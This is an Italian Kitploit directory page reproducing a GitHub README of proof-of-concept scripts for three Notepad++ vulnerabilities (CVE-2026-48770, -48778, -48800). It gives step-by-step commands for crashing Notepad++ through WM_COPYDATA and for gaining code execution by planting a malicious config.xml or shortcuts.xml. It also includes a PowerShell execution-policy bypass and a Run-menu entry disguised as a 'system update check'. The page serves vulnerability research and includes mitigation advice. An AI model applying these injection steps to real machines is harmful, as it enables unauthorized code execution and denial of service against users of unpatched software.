Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Notepad-8.9.6-PoC — Script di prova di concetto per tre vulnerabilità in Notepad++ <= 8.9.6, corrette nella v8.9.6.1 (2026-05-26) CVE-2026-48770 / CVE-2026-48778 / CVE-2026-48800 | Kitploit
Strumenti/GitHubGitHub/atiilla/notepad-8.9.6-poc
Analisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneSviluppo PayloadBinary Exploitation
GitHubatiilla/notepad-8.9.6-poc

Notepad-8.9.6-PoC

Script di prova di concetto per tre vulnerabilità in Notepad++ <= 8.9.6, corrette nella v8.9.6.1 (2026-05-26) CVE-2026-48770 / CVE-2026-48778 / CVE-2026-48800

Vedi Repository
632 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Notepad++ PoCs

CVE-2026-48770 / CVE-2026-48778 / CVE-2026-48800

Script proof-of-concept per tre vulnerabilità in Notepad++ <= 8.9.6, corrette nella v8.9.6.1 (2026-05-26).

CVE-2026-48778 demo - File → Open Containing Folder → cmd triggers RCE


Vulnerabilità

CVETipoCVSSImpatto
CVE-2026-48770Lettura OOB tramite WM_COPYDATA5.0DoS / Crash
CVE-2026-48778Iniezione di comandi OS tramite config.xml7.8RCE
CVE-2026-48800Iniezione di comandi OS tramite shortcuts.xml7.8RCE

Requisiti

  • Windows 10/11 (VM raccomandata)
  • Notepad++ <= 8.9.6 installato e non aggiornato
  • Python 3.x (per script .py)
  • PowerShell (incorporato, per .ps1)

Struttura dei file

root@kitploit:~
.
├── README.md
├── poc_CVE-2026-48770.py                    # OOB read crash (ctypes)
├── poc_CVE-2026-48778.py                    # RCE via config.xml
├── poc_CVE-2026-48800.py                    # RCE via shortcuts.xml
└── payloads/
    ├── config.xml                           # Drop-in payload (CVE-2026-48778)
    ├── shortcuts.xml                        # Drop-in payload (CVE-2026-48800)
    └── poc_CVE-2026-48770.ps1               # OOB read crash (PowerShell)

CVE-2026-48770 - Lettura OOB tramite WM_COPYDATA

Un processo locale nella stessa sessione di Windows invia un messaggio WM_COPYDATA alterato (dwData=3) senza terminatore NUL. Il gestore legge oltre il limite del buffer, producendo una violazione di accesso (0xc0000005) che causa il crash di Notepad++.

Attivazione: Notepad++ deve essere aperto.

PowerShell:

root@kitploit:~
# From payloads\
powershell -ExecutionPolicy Bypass -File poc_CVE-2026-48770.ps1

Python:

root@kitploit:~
python poc_CVE-2026-48770.py

Output previsto:

root@kitploit:~
[+] Found Notepad++ HWND: 0x000A08B4
[*] Sending malformed WM_COPYDATA (dwData=3, cbData=8192, no NUL terminator)...
[+] SendMessageTimeout returned 0 - Notepad++ likely crashed (OOB read -> 0xc0000005)

La finestra di Notepad++ scompare. Potrebbe attivarsi WER (Segnalazione errori Windows).


CVE-2026-48778 - RCE tramite config.xml

%APPDATA%\Notepad++\config.xml viene letto all'avvio. Il valore di <GUIConfig name="commandLineInterpreter"> viene passato direttamente a ShellExecute() senza convalida. Sostituendolo con qualsiasi eseguibile si ottiene RCE quando l'utente fa clic su File → Apri cartella contenitore → cmd.

Metodo A - Script Python (consigliato)

root@kitploit:~
# Inject (backs up original automatically)
python poc_CVE-2026-48778.py --mode direct --payload calc.exe

# Trigger: open Notepad++ -> File -> Open Containing Folder -> cmd
# calc.exe launches instead of cmd.exe

# Restore
python poc_CVE-2026-48778.py --mode direct --restore

Metodo B - File XML da copiare

root@kitploit:~
copy payloads\config.xml %APPDATA%\Notepad++\config.xml
# Aprire Notepad++ -> File -> Apri cartella contenitore -> cmd

Metodo C - settingsDir (senza scrivere in AppData)

root@kitploit:~
python poc_CVE-2026-48778.py --mode settingsdir --payload calc.exe
# Stampa il comando di avvio notepad++.exe -settingsDir=
# Attivazione: File -> Apri cartella contenitore -> cmd

CVE-2026-48800 - RCE tramite shortcuts.xml

%APPDATA%\Notepad++\shortcuts.xml viene letto all'avvio. Le voci <Command> all'interno di <UserDefinedCommands> vengono aggiunte al menu Esegui e passate direttamente a ShellExecute() senza convalida. Una voce controllata dall'attaccante viene eseguita al clic.

Metodo A - Script Python (consigliato)

root@kitploit:~
# Inject (backs up original automatically)
python poc_CVE-2026-48800.py --mode direct --payload calc.exe --name "Controllo aggiornamenti di sistema"

# Trigger: close and reopen Notepad++ -> Run menu -> "Controllo aggiornamenti di sistema"
# calc.exe launches

# Restore
python poc_CVE-2026-48800.py --mode direct --restore

Metodo B - File XML da copiare

root@kitploit:~
copy payloads\shortcuts.xml %APPDATA%\Notepad++\shortcuts.xml
# Riavviare Notepad++ -> Menu Esegui -> "Controllo aggiornamenti di sistema"

Metodo C - settingsDir (senza scrivere in AppData)

root@kitploit:~
python poc_CVE-2026-48800.py --mode settingsdir --payload calc.exe
# Stampa il comando di avvio notepad++.exe -settingsDir=
# Attivazione: Menu Esegui -> "Controllo aggiornamenti di sistema"

Mitigazione

Aggiornare Notepad++ alla v8.9.6.1 o successiva.
Download: https://notepad-plus-plus.org/downloads/


Riferimenti degli Advisory

CVEAvviso
CVE-2026-48770GHSA-r39g-3mcw-xcg2
CVE-2026-48778GHSA-7hm3-wp5q-ccv9
CVE-2026-48800GHSA-3x3f-3j39-pj3v

Solo per scopi di ricerca e test autorizzati.

Scarica lo strumento